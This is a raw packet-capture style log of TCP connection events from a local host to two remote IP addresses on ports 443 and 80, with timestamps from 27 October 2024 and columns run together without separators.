                                                                                                Oct 27, 2024 17:11:09.488879919 CET57760443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:09.489109039 CET57760443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:09.489144087 CET4435776013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:09.586457014 CET4435775613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:09.586617947 CET4435775613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:09.586703062 CET57756443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:09.586781025 CET57756443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:09.586781025 CET57756443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:09.586833000 CET4435775613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:09.586875916 CET4435775613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:09.589066982 CET57761443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:09.589169025 CET4435776113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:09.589267969 CET57761443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:09.589394093 CET57761443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:09.589426041 CET4435776113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:10.195835114 CET4435775713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:10.196250916 CET57757443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:10.196316004 CET4435775713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:10.196743965 CET57757443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:10.196758986 CET4435775713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:10.204555988 CET4435775913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:10.204907894 CET57759443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:10.204926014 CET4435775913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:10.205598116 CET57759443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:10.205609083 CET4435775913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:10.238115072 CET4435776013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:10.238548994 CET57760443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:10.238605976 CET4435776013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:10.238900900 CET57760443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:10.238914013 CET4435776013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:10.240436077 CET4435775813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:10.240736961 CET57758443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:10.240797997 CET4435775813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:10.241082907 CET57758443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:10.241095066 CET4435775813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:10.351541042 CET4435775713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:10.351692915 CET4435775713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:10.351771116 CET57757443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:10.351895094 CET57757443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:10.351933002 CET4435775713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:10.351979017 CET57757443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:10.351993084 CET4435775713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:10.352937937 CET4435775913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:10.353199005 CET4435775913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:10.353277922 CET57759443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:10.353310108 CET57759443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:10.353310108 CET57759443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:10.353327036 CET4435775913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:10.353348970 CET4435775913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:10.354916096 CET57762443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:10.355004072 CET4435776213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:10.355124950 CET57762443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:10.355237007 CET57762443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:10.355257988 CET4435776213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:10.355293989 CET57763443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:10.355371952 CET4435776313.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:10.355448961 CET57763443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:10.355622053 CET57763443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:10.355652094 CET4435776313.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:10.362881899 CET4435776113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:10.363213062 CET57761443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:10.363234043 CET4435776113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:10.363565922 CET57761443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:10.363583088 CET4435776113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:10.370290041 CET4435776013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:10.370433092 CET4435776013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:10.370505095 CET57760443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:10.370573997 CET57760443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:10.370573997 CET57760443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:10.370603085 CET4435776013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:10.370628119 CET4435776013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:10.372648954 CET57764443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:10.372667074 CET4435776413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:10.372751951 CET57764443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:10.372905970 CET57764443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:10.372917891 CET4435776413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:10.373177052 CET4435775813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:10.373320103 CET4435775813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:10.373426914 CET57758443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:10.373512030 CET57758443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:10.373512030 CET57758443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:10.373553038 CET4435775813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:10.373579025 CET4435775813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:10.375591040 CET57765443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:10.375674963 CET4435776513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:10.375757933 CET57765443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:10.375955105 CET57765443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:10.375988007 CET4435776513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:10.494235992 CET4435776113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:10.494376898 CET4435776113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:10.494514942 CET57761443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:10.494570971 CET57761443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:10.494570971 CET57761443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:10.494606018 CET4435776113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:10.494627953 CET4435776113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:10.497200012 CET57766443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:10.497215986 CET4435776613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:10.497478962 CET57766443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:10.497695923 CET57766443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:10.497714043 CET4435776613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:10.756774902 CET5775180192.168.2.4152.89.198.124
                                                                                                Oct 27, 2024 17:11:10.757014990 CET5776780192.168.2.4152.89.198.124
                                                                                                Oct 27, 2024 17:11:10.763802052 CET8057767152.89.198.124192.168.2.4
                                                                                                Oct 27, 2024 17:11:10.763883114 CET5776780192.168.2.4152.89.198.124
                                                                                                Oct 27, 2024 17:11:10.764023066 CET5776780192.168.2.4152.89.198.124
                                                                                                Oct 27, 2024 17:11:10.764285088 CET8057751152.89.198.124192.168.2.4
                                                                                                Oct 27, 2024 17:11:10.764343023 CET5775180192.168.2.4152.89.198.124
                                                                                                Oct 27, 2024 17:11:10.769253969 CET8057767152.89.198.124192.168.2.4
                                                                                                Oct 27, 2024 17:11:11.076210022 CET4435776313.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:11.076642036 CET57763443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:11.076729059 CET4435776313.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:11.077039003 CET57763443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:11.077054024 CET4435776313.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:11.114834070 CET4435776413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:11.115113020 CET57764443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:11.115120888 CET4435776413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:11.115449905 CET57764443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:11.115454912 CET4435776413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:11.116280079 CET4435776213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:11.116570950 CET57762443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:11.116630077 CET4435776213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:11.117090940 CET57762443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:11.117105007 CET4435776213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:11.137674093 CET4435776513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:11.137988091 CET57765443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:11.138025045 CET4435776513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:11.138417006 CET57765443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:11.138430119 CET4435776513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:11.204091072 CET4435776313.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:11.204217911 CET4435776313.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:11.204297066 CET57763443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:11.204417944 CET57763443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:11.204458952 CET4435776313.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:11.204502106 CET57763443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:11.204516888 CET4435776313.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:11.206780910 CET57768443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:11.206813097 CET4435776813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:11.206876993 CET57768443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:11.207057953 CET57768443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:11.207071066 CET4435776813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:11.248553038 CET4435776413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:11.248739958 CET4435776413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:11.248800039 CET57764443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:11.248927116 CET57764443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:11.248936892 CET4435776413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:11.248950958 CET57764443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:11.248955965 CET4435776413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:11.251368046 CET57769443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:11.251463890 CET4435776913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:11.251562119 CET57769443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:11.251697063 CET57769443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:11.251732111 CET4435776913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:11.252439022 CET4435776213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:11.252608061 CET4435776213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:11.252670050 CET57762443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:11.252724886 CET57762443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:11.252724886 CET57762443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:11.252758980 CET4435776213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:11.252782106 CET4435776213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:11.254390955 CET57770443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:11.254410028 CET4435777013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:11.254478931 CET57770443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:11.254587889 CET57770443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:11.254601002 CET4435777013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:11.271100998 CET4435776513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:11.271363974 CET4435776613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:11.271470070 CET4435776513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:11.271538019 CET57765443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:11.271588087 CET57765443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:11.271588087 CET57765443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:11.271620989 CET4435776513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:11.271646976 CET4435776513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:11.271756887 CET57766443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:11.271770954 CET4435776613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:11.272207022 CET57766443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:11.272211075 CET4435776613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:11.273274899 CET57771443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:11.273298979 CET4435777113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:11.273372889 CET57771443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:11.273487091 CET57771443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:11.273510933 CET4435777113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:11.405936003 CET4435776613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:11.406099081 CET4435776613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:11.406325102 CET57766443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:11.406374931 CET57766443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:11.406383991 CET4435776613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:11.406394005 CET57766443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:11.406398058 CET4435776613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:11.408281088 CET57772443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:11.408364058 CET4435777213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:11.408457994 CET57772443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:11.408572912 CET57772443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:11.408596039 CET4435777213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:11.640331030 CET8057767152.89.198.124192.168.2.4
                                                                                                Oct 27, 2024 17:11:11.640422106 CET5776780192.168.2.4152.89.198.124
                                                                                                Oct 27, 2024 17:11:11.971009016 CET4435776813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:11.971427917 CET57768443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:11.971456051 CET4435776813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:11.971846104 CET57768443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:11.971853018 CET4435776813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:11.998219967 CET4435776913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:12.001363993 CET57769443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:12.001429081 CET4435776913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:12.002286911 CET57769443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:12.002300024 CET4435776913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:12.003267050 CET4435777113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:12.003556013 CET57771443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:12.003571033 CET4435777113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:12.003897905 CET57771443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:12.003906965 CET4435777113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:12.015630007 CET4435777013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:12.015898943 CET57770443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:12.015909910 CET4435777013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:12.016235113 CET57770443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:12.016239882 CET4435777013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:12.103971004 CET4435776813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:12.104113102 CET4435776813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:12.104172945 CET57768443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:12.104263067 CET57768443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:12.104279041 CET4435776813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:12.104291916 CET57768443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:12.104299068 CET4435776813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:12.106638908 CET57773443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:12.106717110 CET4435777313.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:12.106789112 CET57773443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:12.106895924 CET57773443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:12.106916904 CET4435777313.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:12.134099007 CET4435776913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:12.134262085 CET4435776913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:12.134332895 CET57769443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:12.134408951 CET57769443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:12.134408951 CET57769443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:12.134469032 CET4435776913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:12.134496927 CET4435776913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:12.135134935 CET4435777113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:12.135566950 CET4435777113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:12.135638952 CET57771443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:12.135672092 CET57771443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:12.135672092 CET57771443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:12.135688066 CET4435777113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:12.135706902 CET4435777113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:12.136970997 CET57774443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:12.137054920 CET4435777413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:12.137123108 CET57774443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:12.137676954 CET57774443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:12.137695074 CET57775443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:12.137711048 CET4435777413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:12.137723923 CET4435777513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:12.137797117 CET57775443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:12.137878895 CET57775443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:12.137891054 CET4435777513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:12.146655083 CET4435777213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:12.146946907 CET57772443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:12.146986961 CET4435777213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:12.147425890 CET57772443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:12.147437096 CET4435777213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:12.150836945 CET4435777013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:12.151201963 CET4435777013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:12.151246071 CET57770443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:12.151283026 CET57770443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:12.151292086 CET4435777013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:12.151304007 CET57770443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:12.151308060 CET4435777013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:12.153218985 CET57776443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:12.153269053 CET4435777613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:12.153341055 CET57776443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:12.153465033 CET57776443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:12.153496981 CET4435777613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:12.279561043 CET4435777213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:12.279722929 CET4435777213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:12.279778957 CET57772443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:12.279836893 CET57772443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:12.279853106 CET4435777213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:12.279865026 CET57772443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:12.279870987 CET4435777213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:12.282731056 CET57777443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:12.282774925 CET4435777713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:12.282850981 CET57777443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:12.283006907 CET57777443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:12.283023119 CET4435777713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:12.866069078 CET4435777513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:12.866511106 CET57775443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:12.866566896 CET4435777513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:12.866898060 CET57775443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:12.866911888 CET4435777513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:12.880526066 CET4435777313.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:12.880887985 CET57773443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:12.880920887 CET4435777313.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:12.881226063 CET57773443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:12.881237984 CET4435777313.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:12.889770985 CET4435777413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:12.890105963 CET57774443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:12.890197039 CET4435777413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:12.890431881 CET57774443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:12.890445948 CET4435777413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:12.894299030 CET4435777613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:12.894588947 CET57776443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:12.894645929 CET4435777613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:12.894881964 CET57776443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:12.894896030 CET4435777613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:12.995201111 CET4435777513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:12.995301008 CET4435777513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:12.995466948 CET57775443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:12.995640039 CET57775443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:12.995640039 CET57775443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:12.995683908 CET4435777513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:12.995707989 CET4435777513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:12.998243093 CET57778443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:12.998358965 CET4435777813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:12.998435974 CET57778443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:12.998568058 CET57778443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:12.998590946 CET4435777813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:13.012022018 CET4435777313.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:13.012573004 CET4435777713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:13.012896061 CET57777443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:13.012898922 CET4435777313.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:13.012931108 CET4435777713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:13.012984991 CET57773443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:13.013072014 CET57773443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:13.013077021 CET57773443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:13.013092041 CET4435777313.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:13.013111115 CET4435777313.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:13.013290882 CET57777443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:13.013298035 CET4435777713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:13.015122890 CET57779443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:13.015146971 CET4435777913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:13.015207052 CET57779443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:13.015331030 CET57779443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:13.015342951 CET4435777913.107.246.51192.168.2.4
